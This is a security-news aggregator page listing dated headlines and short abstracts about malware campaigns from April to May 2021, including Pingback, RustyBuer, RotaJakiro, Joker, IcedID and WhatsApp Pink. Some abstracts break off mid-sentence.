A new Windows malware called Pingback has been found using DLL hijacking attack to target Microsoft Windows 64-bit systems. The malware takes the advantage of ICMP for its command-and-control activities.Cyware Alerts - Hacker News
May 6, 2021
Buer Downloader: Now Using Rust to Hide Itself Full Text
Abstract
A new malicious campaign, masquerading as shipping notices from DHL, was found deploying the latest Buer malware loader variant written in Rust. The new update in Buer helps attackers evade detection and increase successful click rates.Cyware Alerts - Hacker News
May 6, 2021
Roaming Mantis Amplifies Smishing Campaign with OS-Specific Android Malware | McAfee Blogs Full Text
Abstract
Since January 2021, Roaming Mantis has been targeting Japanese users with a new malware called SmsSpy. The malicious code infects Android users using one of two variants based on the version of OS.McAfee
May 06, 2021
New Moriya rootkit used in the wild to backdoor Windows systems Full Text
Abstract
A new stealthy rootkit was used by an unknown threat actor to backdoor targeted Windows systems in a likely ongoing espionage campaign dubbed TunnelSnake and going back to at least 2018.BleepingComputer
May 6, 2021
RaccoonStealer Malware Group Leaves Millions of Stolen Authentication Cookies Exposed in Unsecured Server Full Text
Abstract
This type of malware infects devices and then collects user credentials from web browsers, FTP, and email clients, data that is later uploaded to command and control (C&C) servers.The Record
May 5, 2021
180+ OAuth 2.0 cloud malware apps detected Full Text
Abstract
Cloud malware can be used to conduct reconnaissance, launch employee-to-employee attacks, and steal files and emails from cloud platforms.SCMagazine
May 5, 2021
Panda Stealer Targets Crypto Wallets Full Text
Abstract
Crypto wallets and Discord credentials among targets of new information stealerInfosecurity Magazine
May 5, 2021
BazarLoader Downloader is Using Social Engineering Techniques Full Text
Abstract
It has been discovered in two separate cyberattack campaigns. Both the campaigns employed unique social engineering techniques and popular products used in many organizations.Cyware Alerts - Hacker News
May 04, 2021
New Pingback Malware Using ICMP Tunneling to Evade C&C Detection Full Text
Abstract
Researchers on Tuesday disclosed a novel malware that uses a variety of tricks to stay under the radar and evade detection, while stealthily capable of executing arbitrary commands on infected systems. Called 'Pingback,' the Windows malware leverages Internet Control Message Protocol ( ICMP ) tunneling for covert bot communications, allowing the adversary to utilize ICMP packets to piggyback attack code, according to an analysis published today by Trustwave. Pingback (" oci.dll ") achieves this by getting loaded through a legitimate service called MSDTC (Microsoft Distributed Transaction Coordinator) — a component responsible for handling database operations that are distributed over multiple machines — by taking advantage of a method called DLL search order hijacking , which involves using a genuine application to preload a malicious DLL file. Naming the malware as one of the plugins required for supporting Oracle ODBC interface in MSDTC is key to the attaThe Hacker News
May 04, 2021
New Windows ‘Pingback’ malware uses ICMP for covert communication Full Text
Abstract
Today, Trustwave researchers have disclosed their findings on a novel Windows malware sample that uses Internet Control Message Protocol (ICMP) for its command-and-control (C2) activities. Dubbed "Pingback," this malware targets Windows 64-bit systems, and uses DLL Hijacking to gain persistence.BleepingComputer
May 3, 2021
WeSteal Stealer and WeControl RAT - The New Commodity Malware in Town Full Text
Abstract
Malware curators often peddle their creations in underground forums in creative ways. Now, a new malware is being shamelessly marketed as the leading way to make money in 2021.Cyware Alerts - Hacker News
May 3, 2021
RotaJakiro Stayed Hidden for Several Years Full Text
Abstract
A new malware backdoor in the town is giving a tough time to researchers by using a double encryption algorithm, a combination of AES and XOR, to stay under the radar.Cyware Alerts - Hacker News
May 3, 2021
Hackers Abuse Excel 4.0 Macros to Deliver ZLoader and Quakbot Malware Full Text
Abstract
The Excel macros are quite old, but hackers are targetting them because it provides paths to access all the powerful functionalities like interaction with the operating system (OS).GB Hackers
May 03, 2021
A Rust-based Buer Malware Variant Has Been Spotted in the Wild Full Text
Abstract
Cybersecurity researchers on Monday disclosed a new malspam campaign distributing a fresh variant of a malware loader called 'Buer' written in Rust, illustrating how adversaries are constantly honing their malware toolsets to evade analysis. Dubbed "RustyBuer," the malware is distributed via emails masquerading as shipping notices from DHL Support, and is said to have affected no fewer than 200 organizations across more than 50 verticals since early April. "The new Buer variant is written in Rust, an efficient and easy-to-use programming language that is becoming increasingly popular," Proofpoint researchers said in a report shared with The Hacker News. "Rewriting the malware in Rust enables the threat actor to better evade existing Buer detection capabilities." First introduced in August of 2019, Buer is a modular malware-as-a-service offering that's sold on underground forums and used as a first-stage downloader to deliver additionalThe Hacker News
May 03, 2021
New Chinese Malware Targeted Russia’s Largest Nuclear Submarine Designer Full Text
Abstract
A threat actor believed to be working on behalf of Chinese state-sponsored interests was recently observed targeting a Russia-based defense contractor involved in designing nuclear submarines for the naval arm of the Russian Armed Forces. The phishing attack, which singled out a general director working at the Rubin Design Bureau, leveraged the infamous "Royal Road" Rich Text Format (RTF) weaponizer to deliver a previously undocumented Windows backdoor dubbed " PortDoor ," according to Cybereason's Nocturnus threat intelligence team. "Portdoor has multiple functionalities, including the ability to do reconnaissance, target profiling, delivery of additional payloads, privilege escalation, process manipulation static detection antivirus evasion, one-byte XOR encryption, AES-encrypted data exfiltration and more," the researchers said in a write-up on Friday. Rubin Design Bureau is a submarine design center located in Saint Petersburg, accounting foThe Hacker News
May 2, 2021
WeSteal, a shameless commodity cryptocurrency stealer available for sale Full Text
Abstract
The bold author of a new cryptocurrency stealer, dubbed WeSteal, is promising its customers a leading way to make money in 2021. A new cryptocurrency stealer dubbed WeSteal is available on the cybercrime underground, unlike other commodity cryptocurrency...Security Affairs
May 1, 2021
The Return of Dridex Banking Trojan Full Text
Abstract
Scammers have been found sending QuickBooks invoices to infect victims’ devices with Dridex banking malware. About 14% of the malicious emails reached U.S. clients and 11% to South Korea.Cyware Alerts - Hacker News
April 30, 2021
Researchers sound the alarm after GitHub floats stricter policies Full Text
Abstract
GitHub on Thursday solicited the comments of the security research community on its new, apparently stricter policies for posting malware and proof-of-concept exploits.SCMagazine
April 30, 2021
PortDoor Espionage Malware Takes Aim at Russian Defense Sector Full Text
Abstract
The stealthy backdoor is likely being used by Chinese APTs, researchers said.Threatpost
April 30, 2021
Fake Replica Sites of 900 Global News Outlets Target Users with Malware and Scam Advertisements Full Text
Abstract
In perhaps one of the biggest phishing incidents targeting some of the world’s largest news organizations, hackers have created fake replica websites of news portals of 900 global news portals.The Times Of India
April 29, 2021
ToxicEye RAT is Exploiting Telegram Platform Full Text
Abstract
Private messaging app Telegram is being exploited by cyberattackers who are delivering a ToxicEye RAT to take control over a hacker-operated Telegram account and leak critical data.Cyware Alerts - Hacker News
April 29, 2021
Purple Lambert, a new malware of CIA-linked Lambert APT group Full Text
Abstract
Cybersecurity firm Kaspersky discovered a new strain of malware that is believed to be part of the arsenal of theUS Central Intelligence Agency (CIA). Cybersecurity firm Kaspersky has discovered a new malware that experts attribute to the US Central...Security Affairs
April 29, 2021
Researchers Uncover Stealthy Linux Malware That Went Undetected for 3 Years Full Text
Abstract
A previously undocumented Linux malware with backdoor capabilities has managed to stay under the radar for about three years, allowing the threat actor behind the operation to harvest and exfiltrate sensitive information from infected systems. Dubbed " RotaJakiro " by researchers from Qihoo 360 NETLAB, the backdoor targets Linux X64 machines, and is so named after the fact that "the family uses rotate encryption and behaves differently for root/non-root accounts when executing." The findings come from an analysis of a malware sample it detected on March 25, although early versions appear to have been uploaded to VirusTotal as early as May 2018. A total of four samples have been found to date on the database, all of which remain undetected by most anti-malware engines. As of writing, only seven security vendors flag the latest version of the malware as malicious. "At the functional level, RotaJakiro first determines whether the user is root or non-The Hacker News
April 29, 2021
Water Pamola Campaign Targeted E-Commerce Sites in Japan, Australia, and Europe via Malicious Orders Full Text
Abstract
Water Pamola sent online shopping orders appended with a malicious XSS script to attack e-commerce administrators. These scripts were managed with an XSS attack framework called "XSS.ME."Trend Micro
April 29, 2021
New Shameless WeSteal Commodity Cryptocurrency Stealer and WeControl Commodity RAT Full Text
Abstract
The author of WeSteal, a new commodity cryptocurrency stealer, makes no attempt to disguise the intent for his malware. The seller promises “the leading way to make money in 2021”.Palo Alto Networks
April 28, 2021
Malware Increasingly Using TLS to Hide Communication Full Text
Abstract
Malware actors have doubled the number of attacks leveraging TLS communications, helping them stay hidden from security systems. Only a few are using self-signed certificates.Cyware Alerts - Hacker News
April 28, 2021
New stealthy Linux malware used to backdoor systems for years Full Text
Abstract
A recently discovered Linux malware with backdoor capabilities has flown under the radar for years, allowing attackers to harvest and exfiltrate sensitive information from compromised devices.BleepingComputer
April 28, 2021
Attention! FluBot Android Banking Malware Spreads Quickly Across Europe Full Text
Abstract
Attention, Android users! A banking malware capable of stealing sensitive information is "spreading rapidly" across Europe, with the U.S. likely to be the next target. According to a new analysis by Proofpoint , the threat actors behind FluBot (aka Cabassous ) have branched out beyond Spain to target the U.K., Germany, Hungary, Italy, and Poland. The English-language campaign alone has been observed to make use of more than 700 unique domains, infecting about 7,000 devices in the U.K. In addition, German and English-language SMS messages were found being sent to U.S. users from Europe, which Proofpoint suspects could be the result of malware propagating via contact lists stored on compromised phones. A concerted campaign aimed at the U.S. is yet to be detected. FluBot, a nascent entry in the banking trojan landscape, began its operations late last year, with campaigns leveraging the malware infecting more than 60,000 users in Spain, according to an analysis published bThe Hacker News
April 28, 2021
RedLine Stealer Masquerades as Telegram Installer Full Text
Abstract
The .Net based malware has recently been disguised as an installer of the popular secure messaging app, Telegram. Like Most .Net malware, the fake setup file is packed and highly obfuscated.Minerva Labs
April 27, 2021
WhatsApp Pink Malware Can Auto-Reply to Multiple Messaging Apps Full Text
Abstract
A new version of WhatsApp is making rounds. It claims to give you an enhanced version of WhatsApp with additional features but the truth is that this WhatsApp clone app is malicious.Cyware Alerts - Hacker News
April 27, 2021
New ICS Threat Activity Group: TALONITE Full Text
Abstract
TALONITE gains initial network access via spearphishing that leverages malicious documents and executables focused on engineering-specific themes and concepts to distribute FlowCloud and LookBack.Dragos
April 27, 2021
Dridex Malware Returns In a New Global QuickBooks Malspam Campaign Full Text
Abstract
Phishing attacks masquerading as QuickBooks invoices are targeting users of the popular accounting software in an attempt to infect victim’s devices with the infamous Dridex banking Trojan.Bitdefender
April 27, 2021
Microsoft Defender uses Intel TDT technology against crypto-mining malware Full Text
Abstract
Microsoft announced an improvement of its Defender antivirus that will leverage Intel's Threat Detection Technology (TDT) to detect processes associated with crypto-miners. Microsoft announced that Microsoft Defender for Endpoint, its commercial version...Security Affairs
April 27, 2021
Shlayer macOS malware abuses zero-day to bypass Gatekeeper feature Full Text
Abstract
Apple addresses a zero-day in macOS exploited by Shlayer malware to bypass Apple's security features and deliver second-stage malicious payloads. Apple has addressed a zero-day flaw in macOS that was exploited by Shlayer malware to bypass Apple's...Security Affairs
April 26, 2021
Microsoft Defender now blocks cryptojacking malware using Intel TDT Full Text
Abstract
Microsoft today announced that Microsoft Defender for Endpoint, the enterprise version of its Windows 10 Defender antivirus, now comes with support for blocking cryptojacking malware using Intel's silicon-based Threat Detection Technology (TDT).BleepingComputer
April 26, 2021
European Law Enforcement Uses Customized DLL to Wipe Emotet Malware from Infected Windows PCs Full Text
Abstract
The code was distributed at the end of January to Emotet-infected computers by the malware's command-and-control (C2) infrastructure, which had just been seized in a multinational police operation.The Register
April 26, 2021
Minnesota University Apologizes for Contributing Malicious Code to the Linux Project Full Text
Abstract
Researchers from the University of Minnesota apologized to the maintainers of Linux Kernel Project on Saturday for intentionally including vulnerabilities in the project's code, which led to the school being banned from contributing to the open-source project in the future. "While our goal was to improve the security of Linux, we now understand that it was hurtful to the community to make it a subject of our research, and to waste its effort reviewing these patches without its knowledge or permission," assistant professor Kangjie Lu, along with graduate students Qiushi Wu and Aditya Pakki, said in an email. "We did that because we knew we could not ask the maintainers of Linux for permission, or they would be on the lookout for the hypocrite patches," they added. The apology comes over a study into what's called "hypocrite commits," which was published earlier this February. The project aimed to deliberately add use-after-free vulnerabilThe Hacker News
April 26, 2021
Malware Attack at Technology Provider Radixx Causes Outages in Airline Reservation Systems Full Text
Abstract
Radixx, a technology provider, says a malware attack triggered a dayslong outage that has caused reservations systems to crash at about 20 low-cost airlines around the world.Washington Post
April 26, 2021
Emotet Malware Destroys Itself Today From All Infected Computers Full Text
Abstract
Emotet, the notorious email-based Windows malware behind several botnet-driven spam campaigns and ransomware attacks, was automatically wiped from infected computers en masse following a European law enforcement operation. The development comes three months after a coordinated disruption of Emotet as part of " Operation Ladybird " to seize control of servers used to run and maintain the malware network. The orchestrated effort saw at least 700 servers associated with the botnet's infrastructure neutered from the inside, thus preventing further exploitation. Law enforcement authorities from the Netherlands, Germany, the U.S., U.K., France, Lithuania, Canada, and Ukraine were involved in the international action. Previously, the Dutch police, which seized two central servers located in the country, said it had deployed a software update to counter the threat posed by Emotet effectively. "All infected computer systems will automatically retrieve the update there, aThe Hacker News
April 25, 2021
Emotet malware nukes itself today from all infected computers worldwide Full Text
Abstract
Emotet, one of the most dangerous email spam botnets in recent history, is being uninstalled today from all infected devices with the help of a malware module delivered in January by law enforcement.BleepingComputer
April 24, 2021
Prometei: Yet Another Malware Weaponizing Proxylogon Vulnerabilities Full Text
Abstract
The Prometei variant used in the recent attack was found to provide the attackers with a stealthy and sophisticated backdoor that supported a wide range of tasks, along with harvesting credentials.Cyware Alerts - Hacker News
April 24, 2021
New cryptomining malware builds an army of Windows, Linux bots Full Text
Abstract
A recently discovered cryptomining botnet is actively scanning for vulnerable Windows and Linux enterprise servers and infecting them with Monero (XMRig) miner and self-spreader malware payloads.BleepingComputer
April 24, 2021
XCSSET Malware is Now Targeting Apple’s M1 Chip Full Text
Abstract
A Mac malware has been re-engineered and being used in a campaign aimed at Apple’s new M1 chips to eventually steal data associated with popular applications including Evernote, WeChat, and more.Cyware Alerts - Hacker News
April 24, 2021
Fake Microsoft DirectX 12 site pushes crypto-stealing malware Full Text
Abstract
Cybercriminals have created a fake Microsoft DirectX 12 download page to distribute malware that steals your cryptocurrency wallets and passwords.BleepingComputer
April 24, 2021
ToxicEye RAT exploits Telegram communications to steal data from victims Full Text
Abstract
ToxicEye is a new Remote Access Trojan (RAT) that exploits the Telegram service as part of it command and control infrastructure. ToxicEye RAT is a new malware that leverages the Telegram services for command & control, experts from Check Point...Security Affairs
April 23, 2021
TLS-Encrypted Malware Volumes Double in Just Months Full Text
Abstract
Sophos warns of increasing use of legitimate web services to hide malwareInfosecurity Magazine
April 22, 2021
Malware operators leverage TLS in 46% of detected communications Full Text
Abstract
Malware operators have also been adopting TLS for essentially the same reasons as legitimate companies: To prevent defenders from detecting and stopping the deployment of malware and data theft.SCMagazine
April 22, 2021
Telegram Platform Abused in ‘ToxicEye’ Malware Campaigns Full Text
Abstract
Even if the app is not installed or in use, threat actors can use it to spread malware through email campaigns and take over victims’ machines, new research has found.Threatpost
April 22, 2021
Attackers can hide ‘external sender’ email warnings with HTML and CSS Full Text
Abstract
The "external sender" warnings shown to email recipients by clients like Microsoft Outlook can be hidden by the sender, as demonstrated by a researcher. Turns out, all it takes for attackers to alter the "external sender" warning, or remove it altogether from emails is just a few lines of HTML and CSS code.BleepingComputer
April 22, 2021
Another Malware Made its Way in Google Play Store Full Text
Abstract
A new set of malicious Android apps out there are impersonating security scanner apps on the official Play Store to steal sensitive information or even take full control of users' devices.Cyware Alerts - Hacker News
April 21, 2021
Novel Email-Based Campaign Targets Bloomberg Clients with RATs Full Text
Abstract
Attacks dubbed ‘Fajan’ by researchers are specifically targeted and appear to be testing various threat techniques to find ones with the greatest impact.Threatpost
April 21, 2021
Facebook Busts Palestinian Hackers’ Operation Spreading Mobile Spyware Full Text
Abstract
Facebook on Wednesday said it took steps to dismantle malicious activities perpetrated by two state-sponsored hacking groups operating out of Palestine that abused its platform to distribute malware. The social media giant attributed the attacks to a network connected to the Preventive Security Service ( PSS ), the security apparatus of the State of Palestine, and another threat actor known as Arid Viper (aka Desert Falcon and APT-C-23), the latter of which is alleged to be connected to the cyber arm of Hamas. The two digital espionage campaigns, active in 2019 and 2020, exploited a range of devices and platforms, such as Android, iOS, and Windows, with the PSS cluster primarily targeting domestic audiences in Palestine. The other set of attacks went after users in the Palestinian territories and Syria and, to a lesser extent Turkey, Iraq, Lebanon, and Libya. Both the groups appear to have leveraged the platform as a springboard to launch a variety of social engineering attacks inThe Hacker News
April 21, 2021
WhatsApp Pink malware spreads via group chat messages Full Text
Abstract
A WhatsApp malware dubbed WhatsApp Pink is able to automatically reply to victims' Signal, Telegram, Viber, and Skype messages. A WhatsApp malware dubbed WhatsApp Pink has now been updated, authors have implemented the ability to automatically respond...Security Affairs
April 21, 2021
Linux bans University of Minnesota for committing malicious code Full Text
Abstract
Linux kernel project maintainers have imposed a ban on the University of Minnesota (UMN) from contributing to the open-source Linux project after a group of UMN researchers were caught submitting a series of malicious code commits, or patches that deliberately introduced security vulnerabilities in the official Linux project.BleepingComputer
April 21, 2021
WhatsApp Pink malware can now auto-reply to your Signal, Telegram texts Full Text
Abstract
WhatsApp malware dubbed WhatsApp Pink has now been updated with advanced capabilities that let this counterfeit Android app automatically respond to your Signal, Telegram, Viber, and Skype messages. WhatsApp Pink refers to a counterfeit app that appeared this week, primarily targeting WhatsApp users in the Indian subcontinent.BleepingComputer
April 21, 2021
FormBook: A Well-known Commercial Malware Learns New Tricks Full Text
Abstract
A phishing campaign is luring victims into viewing a video with details of brochures and prices for an old purchase order. The malware involved has made a comeback with a new obfuscation technique.Cyware Alerts - Hacker News
April 21, 2021
Malvertising Operation Tag Barnakle Takes Over Unpatched Revive Servers to Show Malicious Ads Full Text
Abstract
A malvertising operation known under the codename of Tag Barnakle has breached more than 120 ad servers over the past year and inserted malicious code into legitimate ads to redirect website visitors.The Record
April 21, 2021
Updated Hancitor Malware Slings Cobalt Strike Full Text
Abstract
TA511 achieves initial access through a malicious Word document that drops an Hancitor sample as a DLL file and executes it using rundll32, a common Living Off the Land technique.Minerva Labs
April 20, 2021
Over 750,000 Users Downloaded New Billing Fraud Apps From Google Play Store Full Text
Abstract
Researchers have uncovered a new set of fraudulent Android apps in the Google Play store that were found to hijack SMS message notifications for carrying out billing fraud. The apps in question primarily targeted users in Southwest Asia and the Arabian Peninsula, attracting a total of 700,000 downloads before they were discovered and removed from the platform. The findings were reported independently by cybersecurity firms Trend Micro and McAfee . "Posing as photo editors, wallpapers, puzzles, keyboard skins, and other camera-related apps, the malware embedded in these fraudulent apps hijack SMS message notifications and then make unauthorized purchases," researchers from McAfee said in a Monday write-up. The fraudulent apps belong to the so-called " Joker " (aka Bread) malware, which has been found to repeatedly sneak past Google Play defenses over the past four years, resulting in Google removing no fewer than 1,700 infected apps from the Play Store as ofThe Hacker News
April 20, 2021
Joker Malware Pinches 500,000 Huawei Android Users Full Text
Abstract
Roughly half a million Huawei users reportedly downloaded applications hosting the Joker malware that subscribes the victims to unwanted premium mobile services.Cyware Alerts - Hacker News
April 20, 2021
Fake Microsoft Store, Spotify sites spread info-stealing malware Full Text
Abstract
Attackers are promoting sites impersonating the Microsoft Store, Spotify, and an online document converter that distribute malware to steal credit cards and passwords saved in web browsers.BleepingComputer
April 20, 2021
QR Code Malware Threat as Lockdown Ends Full Text
Abstract
Businesses urged to protect BYOD and corporate devicesInfosecurity Magazine
April 19, 2021
Google Alerts continues to be a hotbed of scams and malware Full Text
Abstract
Google Alerts continues to be a hotbed of scams and malware that threat actors are increasingly abusing to promote malicious websites.BleepingComputer
April 19, 2021
XCSSET malware now targets macOS 11 and M1-based Macs Full Text
Abstract
XCSSET, a Mac malware targeting Xcode developers, was now re-engineered and employed in a campaign aimed at Apple's new M1 chips. Experts from Trend Micro have uncovered a Mac malware campaign targeting Xcode developers that employed a re-engineered...Security Affairs
April 19, 2021
Malware That Spreads Via Xcode Projects Now Targeting Apple’s M1-based Macs Full Text
Abstract
A Mac malware campaign targeting Xcode developers has been retooled to add support for Apple's new M1 chips and expand its features to steal confidential information from cryptocurrency apps. XCSSET came into the spotlight in August 2020 after it was found to spread via modified Xcode IDE projects, which, upon the building, were configured to execute the payload. The malware repackages payload modules to imitate legitimate Mac apps, which are ultimately responsible for infecting local Xcode projects and injecting the main payload to execute when the compromised project builds. XCSSET modules come with the capabilities to steal credentials, capture screenshots, inject malicious JavaScript into websites, plunder user data from different apps, and even encrypt files for a ransom. Then in March 2021, Kaspersky researchers uncovered XCSSET samples compiled for the new Apple M1 chips, suggesting that the malware campaign was not only ongoing but also that adversaries are activThe Hacker News
April 19, 2021
Nitroransomware demands gift codes as ransom payments Full Text
Abstract
A new ransomware dubbed 'NitroRansomware' has appeared in the threat landscape, it demands a Discord Nitro gift code to decrypt files. Researchers from BleepingComputer reported infections of a new singular ransomware dubbed NitroRansomware which...Security Affairs
April 19, 2021
WhatsApp Pink is malware spreading through group chats Full Text
Abstract
An unusual baiting technique has appeared with the WhatsApp users receiving links, masked as an official update, that claim to turn the application’s theme from its trademark green to pink.Hackread
April 18, 2021
Saint Bot Downloader - A New Cyberthreat in Making Full Text
Abstract
A previously undocumented malware downloader has been spotted in the wild leveraging phishing attacks to deploy credential stealers and other malicious payloads.Cyware Alerts - Hacker News
April 18, 2021
Is BazarLoader malware linked to Trickbot operators? Full Text
Abstract
Experts warn of malware campaigns delivering the BazarLoader malware abusing popular collaboration tools like Slack and BaseCamp. Since January, researchers observed malware campaigns delivering the BazarLoader malware abusing popular collaboration...Security Affairs
April 16, 2021
Is IcedID Banking Trojan on the Way to Becoming the Next Emotet? Full Text
Abstract
Security analysts observe a similarity between IcedID and Emotet campaigns while outlining the fact that when there was an ongoing effort to take down the latter the former was witnessing an upsurge.Cyware Alerts - Hacker News
April 16, 2021
BazarLoader Malware Abuses Slack, BaseCamp Clouds Full Text
Abstract
Two cyberattack campaigns are making the rounds using unique social-engineering techniques.Threatpost
April 16, 2021
Hackers Used 100,000 Google Sites to Install SolarMarket RAT on Victims Device Full Text
Abstract
Several professionals who had searched the internet for professional forms such as invoices, questionnaires, and receipts were lured into downloading a RAT...Cyber Security News
April 16, 2021
HackBoss malware poses as hacker tools on Telegram to steal digital coins Full Text
Abstract
The authors of a cryptocurrency-stealing malware are distributing it over Telegram to aspiring cybercriminals under the guise of free malicious applications.BleepingComputer
April 16, 2021
Lazarus BTC Changer. Back in action with JS sniffers redesigned to steal crypto Full Text
Abstract
Group-IB observed the North Korea-linked Lazarus APT group stealing cryptocurrency using a never-before-seen tool. In the last five years, JavaScript sniffers have grown into one of the most dangerous threats for e-commerce businesses. The simple...Security Affairs
April 15, 2021
Malware Variants: More Sophisticated, Prevalent and Evolving in 2021 Full Text
Abstract
A malicious program intended to cause havoc with IT systems—malware—is becoming more and more sophisticated every year. The year 2021 is no exception, as recent trends indicate that several new variants of malware are making their way into the world of cybersecurity. While smarter security solutions are popping up, modern malware still eludes and challenges cybersecurity experts. The evolution of malware has infected everything from personal computers to industrial units since the 70s. Cybersecurity firm FireEye's network was attacked in 2020 by hackers with the most sophisticated form of hacking i.e., supply chain. This hacking team demonstrated world-class capabilities to disregard security tools and forensic examination, proving that anybody can be hacked. Also, the year 2021 is already witnessing a bump in COVID-19 vaccine-related phishing attacks . Let's take a look at the trends that forecast an increase in malware attacks: COVID-19 and Work-from-Home (WFH)The Hacker News
April 14, 2021
QBot Malware Is Making a Comeback by Replacing IcedID in Malspam Campaigns Full Text
Abstract
In the first months of the year, researchers noticed a malicious email campaign spreading weaponized Office documents that was delivering QBot trojan, and changing the payload after a short while.Heimdal Security
April 14, 2021
Cracked copies of Microsoft Office and Adobe Photoshop steal your session cookies, browser history, crypto-coins Full Text
Abstract
Cracked copies of Microsoft Office and Adobe Photoshop are stealing browser session cookies and Monero cryptocurrency wallets from tightwads who install the pirated software, Bitdefender has warned.The Register
April 13, 2021
COVID-Related Threats, PowerShell Attacks Lead Malware Surge Full Text
Abstract
Researchers measured 648 new malware threats every minute during Q4 2020.Threatpost
April 13, 2021
New Linux, macOS malware hidden in fake Browserify NPM package Full Text
Abstract
A new malicious package been spotted this week on the npm registry, which targets NodeJS developers using Linux and Apple macOS operating systems for its recon activities. The malicious package is called "web-browserify." It imitates the popular Browserify npm component, downloaded over 160 million times over its lifetime.BleepingComputer
April 13, 2021
QBot malware is back replacing IcedID in malspam campaigns Full Text
Abstract
Malware distributors are rotating payloads once again, switching between trojans that are many times an intermediary stage in a longer infection chain.BleepingComputer
April 13, 2021
Hackers Using Website’s Contact Forms to Deliver IcedID Malware Full Text
Abstract
Microsoft has warned organizations of a "unique" attack campaign that abuses contact forms published on websites to deliver malicious links to businesses via emails containing fake legal threats, in what's yet another instance of adversaries abusing legitimate infrastructure to mount evasive campaigns that bypass security protections. "The emails instruct recipients to click a link to review supposed evidence behind their allegations, but are instead led to the download of IcedID, an info-stealing malware," the company's threat intelligence team said in a write-up published last Friday. IceID is a Windows-based banking trojan that's used for reconnaissance and exfiltration of banking credentials, alongside features that allow it to connect to a remote command-and-control (C2) server to deploy additional payloads such as ransomware and malware capable of performing hands-on-keyboard attacks, stealing credentials, and moving laterally across affecteThe Hacker News
April 12, 2021
New Malware Downloader Spotted in Targeted Campaigns Full Text
Abstract
A relatively sophisticated new malware downloader, dubbed as Saint Bot, has surfaced in recent weeks that, though not widespread yet, appears to be gaining momentum. The downloader is being used to drop stealers on compromised systems.Dark Reading
April 11, 2021
Joker malware infected 538,000 Huawei Android devices Full Text
Abstract
More than 500,000 Huawei users have been infected with the Joker malware after downloading apps from the company’s official Android store. More than 500,000 Huawei users were infected with the Joker malware after they have downloaded tainted apps...Security Affairs
April 10, 2021
Joker malware infects over 500,000 Huawei Android devices Full Text
Abstract
More than 500,000 Huawei users have downloaded from the company's official Android store applications infected with Joker malware that subscribes to premium mobile services.BleepingComputer
April 10, 2021
Android malware found on Huawei’s official app store Full Text
Abstract
Researchers say the ten apps posed as legitimate applications, such as virtual keyboards, camera apps, app launchers, instant messengers, sticker collections, coloring programs, and games.The Record
April 10, 2021
Android malware found embedded in APKPure store application Full Text
Abstract
Security researchers found malware embedded within the official application of APKPure, a popular third-party Android app store and an alternative to Google's official Play Store.BleepingComputer
April 10, 2021
Crooks abuse website contact forms to deliver IcedID malware Full Text
Abstract
Microsoft researchers spotted a malware campaign abusing contact forms on legitimate websites to deliver the IcedID malware. Security experts from Microsoft have uncovered a malware campaign abusing contact forms on legitimate websites to deliver...Security Affairs
April 10, 2021
Facebook ads dropped malware posing as Clubhouse app for PC Full Text
Abstract
Threat actors are delivering Facebook ads promoting Clubhouse app for PC to deliver the malware. The attackers have used the old tactics again because the PC version of the Clubhouse app is not yet released.Hackread
April 10, 2021
Collaboration Platforms Increasingly Abused for Malware Distribution, Data Exfiltration Full Text
Abstract
Threat actors are increasingly abusing collaboration platforms for nefarious purposes, including malware delivery and data exfiltration, security researchers with Cisco’s Talos division report.Security Week
April 09, 2021
Attackers deliver legal threats, IcedID malware via contact forms Full Text
Abstract
Threat actors are using legitimate corporate contact forms to send phishing emails that threaten enterprise targets with lawsuits and attempt to infect them with the IcedID info-stealing malware.BleepingComputer
April 09, 2021
Alert — There’s A New Malware Out There Snatching Users’ Passwords Full Text
Abstract
A previously undocumented malware downloader has been spotted in the wild in phishing attacks to deploy credential stealers and other malicious payloads. Dubbed " Saint Bot ," the malware is said to have first appeared on the scene in January 2021, with indications that it's under active development. "Saint Bot is a downloader that appeared quite recently, and slowly is getting momentum. It was seen dropping stealers (i.e. Taurus Stealer) or further loaders ( example ), yet its design allows [it] to utilize it for distributing any kind of malware," said Aleksandra "Hasherezade" Doniec, a threat intelligence analyst at Malwarebytes. "Furthermore, Saint Bot employs a wide variety of techniques which, although not novel, indicate some level of sophistication considering its relatively new appearance." The infection chain analyzed by the cybersecurity firm begins with a phishing email containing an embedded ZIP file ("bitcoin.zip&quoThe Hacker News
April 09, 2021
Gigaset Android Update Server Hacked to Install Malware on Users’ Devices Full Text
Abstract
Gigaset has revealed a malware infection discovered in its Android devices was the result of a compromise of a server belonging to an external update service provider. Impacting older smartphone models — GS100, GS160, GS170, GS180, GS270 (plus), and GS370 (plus) series — the malware took the form of multiple unwanted apps that were downloaded and installed through a pre-installed system update app. The infections are said to have occurred starting March 27 . The German manufacturer of telecommunications devices said it took steps to alert the update service provider of the issue, following which further infections were prevented on April 7. "Measures have been taken to automatically rid infected devices of the malware. In order for this to happen the devices must be connected to the internet (WLAN, WiFi or mobile data). We also recommend connecting the devices to their chargers. Affected devices should automatically be freed from the malware within 8 hours," the compThe Hacker News
April 8, 2021
Adware Spreads via Fake TikTok App, Laptop Offers Full Text
Abstract
Cybercriminals are encouraging users to send the “offers” via WhatsApp to their friends as well.Threatpost
April 8, 2021
IcedID Banking Trojan Surges: The New Emotet? Full Text
Abstract
A widespread email campaign using malicious Microsoft Excel attachments and Excel 4 macros is delivering IcedID at high volumes, suggesting it’s filling the Emotet void.Threatpost
April 8, 2021
(Are you) afreight of the dark? Watch out for Vyveva, new Lazarus backdoor Full Text
Abstract
ESET researchers have discovered a previously undocumented Lazarus malware backdoor used to attack a freight logistics company in South Africa, which they have dubbed Vyveva.ESET Security
April 08, 2021
Researchers uncover a new Iranian malware used in recent cyberattacks Full Text
Abstract
An Iranian threat actor has unleashed a new cyberespionage campaign against a possible Lebanese target with a backdoor capable of exfiltrating sensitive information from compromised systems. Cybersecurity firm Check Point attributed the operation to APT34, citing similarities with previous techniques used by the threat actor as well as based on its pattern of victimology. APT34 (aka OilRig) is known for its reconnaissance campaigns aligned with the strategic interests of Iran, primarily hitting financial, government, energy, chemical, and telecommunications industries in the Middle East. The group typically resorts to targeting individuals through the use of booby-trapped job offer documents, delivered directly to the victims via LinkedIn messages, and the latest campaign is no exception, although the mode of delivery remains unclear as yet. The Word document analyzed by Check Point — which was uploaded to VirusTotal from Lebanon on January 10 — claims to offer information aboThe Hacker News
April 8, 2021
Yanbian Gang Malware Continues with Wide-Scale Distribution and C2 Full Text
Abstract
Yanbian Gang has targeted South Korean Android mobile banking customers since 2013 with malicious Android apps purporting to be from major banks, namely Shinhan Savings Bank, Saemaul Geumgo, and more.Risk IQ
April 08, 2021
North Korean hackers use new Vyveva malware to attack freighters Full Text
Abstract
